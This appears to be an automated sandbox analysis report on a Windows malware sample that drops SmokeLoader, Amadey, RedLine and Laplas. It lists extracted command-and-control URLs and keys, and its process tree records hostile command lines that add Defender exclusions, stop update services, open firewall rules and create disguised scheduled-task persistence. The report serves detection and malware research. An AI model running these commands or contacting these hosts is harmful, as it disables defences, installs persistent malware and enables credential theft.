Analysis
-
max time kernel
82s -
max time network
302s -
platform
windows10-1703_x64 -
resource
win10-20230831-en -
resource tags
arch:x64arch:x86image:win10-20230831-enlocale:en-usos:windows10-1703-x64system -
submitted
10/09/2023, 22:20 UTC
Static task
static1
Behavioral task
behavioral1
Sample
fcada0e44d40984056b51b285a867711b42628955ba16a1905a6e1843866688f.exe
Resource
win7-20230831-en
Behavioral task
behavioral2
Sample
fcada0e44d40984056b51b285a867711b42628955ba16a1905a6e1843866688f.exe
Resource
win10-20230831-en
General
-
Target
fcada0e44d40984056b51b285a867711b42628955ba16a1905a6e1843866688f.exe
-
Size
209KB
-
MD5
2d4a5aae6252df0365df9ac9697c07bb
-
SHA1
575cb8d0a599fb510a845ff34b12755ffa6059a1
-
SHA256
fcada0e44d40984056b51b285a867711b42628955ba16a1905a6e1843866688f
-
SHA512
c2a490a75eda3db1cb0f6619ef6b17f302eb0a09fb84059a84be16027b19b6c171881b2ec79a355927f7325856bdf15193c4668bb8a574fad975b99c39333a73
-
SSDEEP
3072:Nm1j4coDz/zWbnUdrkAr+KogV2pf/raZ2ztK/hOAg0Fujv5MnTq5yrDZwYq2J267:NmWpDWAJkAr+Dvra5QAOVMnXc67
Malware Config
Extracted
smokeloader
2022
http://77.91.68.29/fks/
Extracted
amadey
3.83
http://5.42.65.80/8bmeVwqx/index.php
-
install_dir
207aa4515d
-
install_file
oneetx.exe
-
strings_key
3e634dd0840c68ae2ced83c2be7bf0d4
Extracted
redline
amadey_api
amadapi.tuktuk.ug:11290
-
auth_value
a004bea47cf55a1c8841d46c3fe3e6f5
Extracted
laplas
http://lpls.tuktuk.ug
-
api_key
a0f588021b58e0c7908a163f8750678efedf2a66bf739a12427b379aef47ccde
Signatures
-
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine payload 3 IoCs
resource yara_rule behavioral2/memory/2272-64-0x00000000010D0000-0x000000000125E000-memory.dmp family_redline behavioral2/memory/2236-65-0x0000000000400000-0x000000000045A000-memory.dmp family_redline behavioral2/memory/2272-71-0x00000000010D0000-0x000000000125E000-memory.dmp family_redline -
SmokeLoader
Modular backdoor trojan in use since 2014.
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 2 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ winlog.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ winlog.exe -
Blocklisted process makes network request 1 IoCs
flow pid Process 41 4112 powershell.exe -
Downloads MZ/PE file
-
Modifies Windows Firewall 1 TTPs 1 IoCs
pid Process 4012 netsh.exe -
Stops running service(s) 3 TTPs
-
Checks BIOS information in registry 2 TTPs 4 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion winlog.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion winlog.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion winlog.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion winlog.exe -
Executes dropped EXE 13 IoCs
pid Process 2272 D4DF.exe 1292 D7AF.exe 4756 D8F8.exe 3392 oneetx.exe 1336 ss41.exe 2884 taskhost.exe 692 winlog.exe 3000 msedge.exe 4220 toolspub2.exe 4336 taskhost.exe 812 winlog.exe 4212 msedge.exe 664 31839b57a4f11171d6abc8bbc4451ee4.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Uses the VBS compiler for execution 1 TTPs
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
description ioc Process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA winlog.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA winlog.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
pid Process 692 winlog.exe 812 winlog.exe -
Suspicious use of SetThreadContext 4 IoCs
description pid Process procid_target PID 3208 set thread context of 1888 3208 fcada0e44d40984056b51b285a867711b42628955ba16a1905a6e1843866688f.exe 70 PID 2272 set thread context of 2236 2272 D4DF.exe 74 PID 2884 set thread context of 4112 2884 taskhost.exe 214 PID 4336 set thread context of 3124 4336 taskhost.exe 96 -
Launches sc.exe 30 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 3760 sc.exe 5092 sc.exe 2760 sc.exe 4516 sc.exe 4412 sc.exe 4756 sc.exe 2024 sc.exe 3596 sc.exe 1340 sc.exe 2064 sc.exe 732 sc.exe 2200 sc.exe 1512 sc.exe 712 sc.exe 2640 sc.exe 4940 sc.exe 4240 sc.exe 2752 sc.exe 4716 sc.exe 432 sc.exe 4176 sc.exe 4768 sc.exe 4504 sc.exe 4592 sc.exe 1388 sc.exe 4804 sc.exe 3748 sc.exe 4824 sc.exe 3584 sc.exe 1648 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 1 IoCs
pid pid_target Process procid_target 212 3208 WerFault.exe 69 -
Checks SCSI registry key(s) 3 TTPs 3 IoCs
SCSI information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI AppLaunch.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI AppLaunch.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI AppLaunch.exe -
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 1784 schtasks.exe -
GoLang User-Agent 1 IoCs
Uses default user-agent string defined by GoLang HTTP packages.
description flow ioc HTTP User-Agent header 62 Go-http-client/1.1 -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 1888 AppLaunch.exe 1888 AppLaunch.exe 3276 Process not Found 3276 Process not Found 3276 Process not Found 3276 Process not Found 3276 Process not Found 3276 Process not Found 3276 Process not Found 3276 Process not Found 3276 Process not Found 3276 Process not Found 3276 Process not Found 3276 Process not Found 3276 Process not Found 3276 Process not Found 3276 Process not Found 3276 Process not Found 3276 Process not Found 3276 Process not Found 3276 Process not Found 3276 Process not Found 3276 Process not Found 3276 Process not Found 3276 Process not Found 3276 Process not Found 3276 Process not Found 3276 Process not Found 3276 Process not Found 3276 Process not Found 3276 Process not Found 3276 Process not Found 3276 Process not Found 3276 Process not Found 3276 Process not Found 3276 Process not Found 3276 Process not Found 3276 Process not Found 3276 Process not Found 3276 Process not Found 3276 Process not Found 3276 Process not Found 3276 Process not Found 3276 Process not Found 3276 Process not Found 3276 Process not Found 3276 Process not Found 3276 Process not Found 3276 Process not Found 3276 Process not Found 3276 Process not Found 3276 Process not Found 3276 Process not Found 3276 Process not Found 3276 Process not Found 3276 Process not Found 3276 Process not Found 3276 Process not Found 3276 Process not Found 3276 Process not Found 3276 Process not Found 3276 Process not Found 3276 Process not Found 3276 Process not Found -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
pid Process 3276 Process not Found -
Suspicious behavior: MapViewOfSection 1 IoCs
pid Process 1888 AppLaunch.exe -
Suspicious use of AdjustPrivilegeToken 31 IoCs
description pid Process Token: SeShutdownPrivilege 3276 Process not Found Token: SeCreatePagefilePrivilege 3276 Process not Found Token: SeShutdownPrivilege 3276 Process not Found Token: SeCreatePagefilePrivilege 3276 Process not Found Token: SeShutdownPrivilege 3276 Process not Found Token: SeCreatePagefilePrivilege 3276 Process not Found Token: SeShutdownPrivilege 3276 Process not Found Token: SeCreatePagefilePrivilege 3276 Process not Found Token: SeShutdownPrivilege 3276 Process not Found Token: SeCreatePagefilePrivilege 3276 Process not Found Token: SeShutdownPrivilege 3276 Process not Found Token: SeCreatePagefilePrivilege 3276 Process not Found Token: SeShutdownPrivilege 3276 Process not Found Token: SeCreatePagefilePrivilege 3276 Process not Found Token: SeShutdownPrivilege 3276 Process not Found Token: SeCreatePagefilePrivilege 3276 Process not Found Token: SeShutdownPrivilege 3276 Process not Found Token: SeCreatePagefilePrivilege 3276 Process not Found Token: SeShutdownPrivilege 3276 Process not Found Token: SeCreatePagefilePrivilege 3276 Process not Found Token: SeShutdownPrivilege 3276 Process not Found Token: SeCreatePagefilePrivilege 3276 Process not Found Token: SeDebugPrivilege 4756 sc.exe Token: SeShutdownPrivilege 3276 Process not Found Token: SeCreatePagefilePrivilege 3276 Process not Found Token: SeShutdownPrivilege 3276 Process not Found Token: SeCreatePagefilePrivilege 3276 Process not Found Token: SeShutdownPrivilege 3276 Process not Found Token: SeCreatePagefilePrivilege 3276 Process not Found Token: SeShutdownPrivilege 3276 Process not Found Token: SeCreatePagefilePrivilege 3276 Process not Found -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 3208 wrote to memory of 1888 3208 fcada0e44d40984056b51b285a867711b42628955ba16a1905a6e1843866688f.exe 70 PID 3208 wrote to memory of 1888 3208 fcada0e44d40984056b51b285a867711b42628955ba16a1905a6e1843866688f.exe 70 PID 3208 wrote to memory of 1888 3208 fcada0e44d40984056b51b285a867711b42628955ba16a1905a6e1843866688f.exe 70 PID 3208 wrote to memory of 1888 3208 fcada0e44d40984056b51b285a867711b42628955ba16a1905a6e1843866688f.exe 70 PID 3208 wrote to memory of 1888 3208 fcada0e44d40984056b51b285a867711b42628955ba16a1905a6e1843866688f.exe 70 PID 3208 wrote to memory of 1888 3208 fcada0e44d40984056b51b285a867711b42628955ba16a1905a6e1843866688f.exe 70 PID 3276 wrote to memory of 2272 3276 Process not Found 73 PID 3276 wrote to memory of 2272 3276 Process not Found 73 PID 3276 wrote to memory of 2272 3276 Process not Found 73 PID 2272 wrote to memory of 2236 2272 D4DF.exe 74 PID 2272 wrote to memory of 2236 2272 D4DF.exe 74 PID 2272 wrote to memory of 2236 2272 D4DF.exe 74 PID 2272 wrote to memory of 2236 2272 D4DF.exe 74 PID 2272 wrote to memory of 2236 2272 D4DF.exe 74 PID 3276 wrote to memory of 1292 3276 Process not Found 75 PID 3276 wrote to memory of 1292 3276 Process not Found 75 PID 3276 wrote to memory of 1292 3276 Process not Found 75 PID 3276 wrote to memory of 4756 3276 Process not Found 76 PID 3276 wrote to memory of 4756 3276 Process not Found 76 PID 3276 wrote to memory of 4756 3276 Process not Found 76 PID 1292 wrote to memory of 3392 1292 D7AF.exe 77 PID 1292 wrote to memory of 3392 1292 D7AF.exe 77 PID 1292 wrote to memory of 3392 1292 D7AF.exe 77 PID 3392 wrote to memory of 1784 3392 oneetx.exe 81 PID 3392 wrote to memory of 1784 3392 oneetx.exe 81 PID 3392 wrote to memory of 1784 3392 oneetx.exe 81 PID 3392 wrote to memory of 2392 3392 oneetx.exe 79 PID 3392 wrote to memory of 2392 3392 oneetx.exe 79 PID 3392 wrote to memory of 2392 3392 oneetx.exe 79 PID 2392 wrote to memory of 660 2392 cmd.exe 82 PID 2392 wrote to memory of 660 2392 cmd.exe 82 PID 2392 wrote to memory of 660 2392 cmd.exe 82 PID 2392 wrote to memory of 4264 2392 cmd.exe 190 PID 2392 wrote to memory of 4264 2392 cmd.exe 190 PID 2392 wrote to memory of 4264 2392 cmd.exe 190 PID 2392 wrote to memory of 4256 2392 cmd.exe 84 PID 2392 wrote to memory of 4256 2392 cmd.exe 84 PID 2392 wrote to memory of 4256 2392 cmd.exe 84 PID 2392 wrote to memory of 2124 2392 cmd.exe 168 PID 2392 wrote to memory of 2124 2392 cmd.exe 168 PID 2392 wrote to memory of 2124 2392 cmd.exe 168 PID 2392 wrote to memory of 3996 2392 cmd.exe 86 PID 2392 wrote to memory of 3996 2392 cmd.exe 86 PID 2392 wrote to memory of 3996 2392 cmd.exe 86 PID 2392 wrote to memory of 2180 2392 cmd.exe 121 PID 2392 wrote to memory of 2180 2392 cmd.exe 121 PID 2392 wrote to memory of 2180 2392 cmd.exe 121 PID 3392 wrote to memory of 1336 3392 oneetx.exe 88 PID 3392 wrote to memory of 1336 3392 oneetx.exe 88 PID 3392 wrote to memory of 2884 3392 oneetx.exe 90 PID 3392 wrote to memory of 2884 3392 oneetx.exe 90 PID 3392 wrote to memory of 2884 3392 oneetx.exe 90 PID 2884 wrote to memory of 4112 2884 taskhost.exe 214 PID 2884 wrote to memory of 4112 2884 taskhost.exe 214 PID 2884 wrote to memory of 4112 2884 taskhost.exe 214 PID 2884 wrote to memory of 4112 2884 taskhost.exe 214 PID 2884 wrote to memory of 4112 2884 taskhost.exe 214 PID 3392 wrote to memory of 692 3392 oneetx.exe 92 PID 3392 wrote to memory of 692 3392 oneetx.exe 92 PID 3392 wrote to memory of 3000 3392 oneetx.exe 93 PID 3392 wrote to memory of 3000 3392 oneetx.exe 93 PID 3392 wrote to memory of 4220 3392 oneetx.exe 94 PID 3392 wrote to memory of 4220 3392 oneetx.exe 94 PID 3392 wrote to memory of 4220 3392 oneetx.exe 94 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Users\Admin\AppData\Local\Temp\fcada0e44d40984056b51b285a867711b42628955ba16a1905a6e1843866688f.exe"C:\Users\Admin\AppData\Local\Temp\fcada0e44d40984056b51b285a867711b42628955ba16a1905a6e1843866688f.exe"1⤵
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:3208 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"2⤵
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
PID:1888
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3208 -s 2122⤵
- Program crash
PID:212
-
-
C:\Users\Admin\AppData\Local\Temp\D4DF.exeC:\Users\Admin\AppData\Local\Temp\D4DF.exe1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:2272 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"2⤵PID:2236
-
-
C:\Users\Admin\AppData\Local\Temp\D7AF.exeC:\Users\Admin\AppData\Local\Temp\D7AF.exe1⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:1292 -
C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe"C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe"2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:3392 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /k echo Y|CACLS "oneetx.exe" /P "Admin:N"&&CACLS "oneetx.exe" /P "Admin:R" /E&&echo Y|CACLS "..\207aa4515d" /P "Admin:N"&&CACLS "..\207aa4515d" /P "Admin:R" /E&&Exit3⤵
- Suspicious use of WriteProcessMemory
PID:2392 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"4⤵PID:660
-
-
C:\Windows\SysWOW64\cacls.exeCACLS "oneetx.exe" /P "Admin:N"4⤵PID:4264
-
-
C:\Windows\SysWOW64\cacls.exeCACLS "oneetx.exe" /P "Admin:R" /E4⤵PID:4256
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"4⤵PID:2124
-
-
C:\Windows\SysWOW64\cacls.exeCACLS "..\207aa4515d" /P "Admin:N"4⤵PID:3996
-
-
C:\Windows\SysWOW64\cacls.exeCACLS "..\207aa4515d" /P "Admin:R" /E4⤵PID:2180
-
-
-
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN oneetx.exe /TR "C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe" /F3⤵
- Creates scheduled task(s)
PID:1784
-
-
C:\Users\Admin\AppData\Local\Temp\1000454001\ss41.exe"C:\Users\Admin\AppData\Local\Temp\1000454001\ss41.exe"3⤵
- Executes dropped EXE
PID:1336
-
-
C:\Users\Admin\AppData\Local\Temp\1000397001\taskhost.exe"C:\Users\Admin\AppData\Local\Temp\1000397001\taskhost.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:2884 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"4⤵PID:4112
-
-
-
C:\Users\Admin\AppData\Local\Temp\1000398001\winlog.exe"C:\Users\Admin\AppData\Local\Temp\1000398001\winlog.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:692
-
-
C:\Users\Admin\AppData\Local\Temp\1000399001\msedge.exe"C:\Users\Admin\AppData\Local\Temp\1000399001\msedge.exe"3⤵
- Executes dropped EXE
PID:3000
-
-
C:\Users\Admin\AppData\Local\Temp\1000455001\toolspub2.exe"C:\Users\Admin\AppData\Local\Temp\1000455001\toolspub2.exe"3⤵
- Executes dropped EXE
PID:4220 -
C:\Users\Admin\AppData\Local\Temp\1000455001\toolspub2.exe"C:\Users\Admin\AppData\Local\Temp\1000455001\toolspub2.exe"4⤵PID:2980
-
-
-
C:\Users\Admin\AppData\Local\Temp\1000397001\taskhost.exe"C:\Users\Admin\AppData\Local\Temp\1000397001\taskhost.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:4336 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"4⤵PID:3124
-
-
-
C:\Users\Admin\AppData\Local\Temp\1000398001\winlog.exe"C:\Users\Admin\AppData\Local\Temp\1000398001\winlog.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:812 -
C:\Users\Admin\AppData\Roaming\NTSystem\ntlhost.exeC:\Users\Admin\AppData\Roaming\NTSystem\ntlhost.exe4⤵PID:1708
-
-
-
C:\Users\Admin\AppData\Local\Temp\1000399001\msedge.exe"C:\Users\Admin\AppData\Local\Temp\1000399001\msedge.exe"3⤵
- Executes dropped EXE
PID:4212
-
-
C:\Users\Admin\AppData\Local\Temp\1000456001\31839b57a4f11171d6abc8bbc4451ee4.exe"C:\Users\Admin\AppData\Local\Temp\1000456001\31839b57a4f11171d6abc8bbc4451ee4.exe"3⤵
- Executes dropped EXE
PID:664 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile4⤵PID:2640
-
-
C:\Users\Admin\AppData\Local\Temp\1000456001\31839b57a4f11171d6abc8bbc4451ee4.exe"C:\Users\Admin\AppData\Local\Temp\1000456001\31839b57a4f11171d6abc8bbc4451ee4.exe"4⤵PID:1396
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile5⤵
- Blocklisted process makes network request
PID:4112
-
-
C:\Windows\System32\cmd.exeC:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"5⤵PID:4952
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes6⤵
- Modifies Windows Firewall
PID:4012
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile5⤵PID:4808
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile5⤵PID:2444
-
-
C:\Windows\rss\csrss.exeC:\Windows\rss\csrss.exe5⤵PID:3948
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\1000397001\taskhost.exe"C:\Users\Admin\AppData\Local\Temp\1000397001\taskhost.exe"3⤵PID:4244
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"4⤵PID:1348
-
-
-
C:\Users\Admin\AppData\Local\Temp\1000398001\winlog.exe"C:\Users\Admin\AppData\Local\Temp\1000398001\winlog.exe"3⤵PID:1796
-
-
C:\Users\Admin\AppData\Local\Temp\1000399001\msedge.exe"C:\Users\Admin\AppData\Local\Temp\1000399001\msedge.exe"3⤵PID:4248
-
-
C:\Users\Admin\AppData\Local\Temp\1000457001\latestX.exe"C:\Users\Admin\AppData\Local\Temp\1000457001\latestX.exe"3⤵PID:2652
-
-
C:\Users\Admin\AppData\Local\Temp\1000397001\taskhost.exe"C:\Users\Admin\AppData\Local\Temp\1000397001\taskhost.exe"3⤵PID:3816
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"4⤵PID:3772
-
-
-
C:\Users\Admin\AppData\Local\Temp\1000398001\winlog.exe"C:\Users\Admin\AppData\Local\Temp\1000398001\winlog.exe"3⤵PID:888
-
-
C:\Users\Admin\AppData\Local\Temp\1000399001\msedge.exe"C:\Users\Admin\AppData\Local\Temp\1000399001\msedge.exe"3⤵PID:4644
-
-
-
C:\Users\Admin\AppData\Local\Temp\D8F8.exeC:\Users\Admin\AppData\Local\Temp\D8F8.exe1⤵
- Executes dropped EXE
PID:4756
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force1⤵PID:2324
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force1⤵PID:4328
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force1⤵PID:4672
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force1⤵PID:3592
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force1⤵PID:408
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV12⤵PID:2180
-
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc1⤵PID:4372
-
C:\Windows\System32\sc.exesc stop UsoSvc2⤵
- Launches sc.exe
PID:712
-
-
C:\Windows\System32\sc.exesc stop WaaSMedicSvc2⤵
- Launches sc.exe
PID:4716
-
-
C:\Windows\System32\sc.exesc stop wuauserv2⤵
- Launches sc.exe
PID:2640
-
-
C:\Windows\System32\sc.exesc stop bits2⤵
- Launches sc.exe
PID:2024
-
-
C:\Windows\System32\sc.exesc stop dosvc2⤵
- Launches sc.exe
PID:3584
-
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc1⤵PID:4384
-
C:\Windows\System32\sc.exesc stop UsoSvc2⤵
- Launches sc.exe
PID:4824
-
-
C:\Windows\System32\sc.exesc stop WaaSMedicSvc2⤵
- Launches sc.exe
PID:4504
-
-
C:\Windows\System32\sc.exesc stop wuauserv2⤵
- Launches sc.exe
PID:432
-
-
C:\Windows\System32\sc.exesc stop bits2⤵
- Launches sc.exe
PID:3760
-
-
C:\Windows\System32\sc.exesc stop dosvc2⤵
- Launches sc.exe
PID:3596
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#qbjrr#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }1⤵PID:4664
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 01⤵PID:3940
-
C:\Windows\System32\powercfg.exepowercfg /x -hibernate-timeout-ac 02⤵PID:4980
-
-
C:\Windows\System32\powercfg.exepowercfg /x -hibernate-timeout-dc 02⤵PID:2384
-
-
C:\Windows\System32\powercfg.exepowercfg /x -standby-timeout-ac 02⤵PID:644
-
-
C:\Windows\System32\powercfg.exepowercfg /x -standby-timeout-dc 02⤵PID:672
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#qbjrr#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }1⤵PID:1280
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 01⤵PID:512
-
C:\Windows\System32\powercfg.exepowercfg /x -hibernate-timeout-ac 02⤵PID:4180
-
-
C:\Windows\System32\powercfg.exepowercfg /x -hibernate-timeout-dc 02⤵PID:4004
-
-
C:\Windows\System32\powercfg.exepowercfg /x -standby-timeout-ac 02⤵PID:1984
-
-
C:\Windows\System32\powercfg.exepowercfg /x -standby-timeout-dc 02⤵PID:2184
-
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc1⤵PID:4980
-
C:\Windows\System32\sc.exesc stop UsoSvc2⤵
- Launches sc.exe
PID:4592
-
-
C:\Windows\System32\sc.exesc stop WaaSMedicSvc2⤵
- Launches sc.exe
PID:2760
-
-
C:\Windows\System32\sc.exesc stop wuauserv2⤵
- Launches sc.exe
PID:1340
-
-
C:\Windows\System32\sc.exesc stop bits2⤵
- Launches sc.exe
PID:4176
-
-
C:\Windows\System32\sc.exesc stop dosvc2⤵
- Launches sc.exe
PID:2064
-
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc1⤵PID:4200
-
C:\Windows\System32\sc.exesc stop UsoSvc2⤵
- Launches sc.exe
PID:4516
-
-
C:\Windows\System32\sc.exesc stop WaaSMedicSvc2⤵
- Launches sc.exe
PID:4940
-
-
C:\Windows\System32\sc.exesc stop wuauserv2⤵
- Launches sc.exe
PID:5092
-
-
C:\Windows\System32\sc.exesc stop bits2⤵
- Launches sc.exe
PID:1388
-
-
C:\Windows\System32\sc.exesc stop dosvc2⤵
- Launches sc.exe
PID:4804
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#qbjrr#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }1⤵PID:2388
-
C:\Windows\System32\schtasks.exeC:\Windows\System32\schtasks.exe /run /tn "GoogleUpdateTaskMachineQC"1⤵PID:5072
-
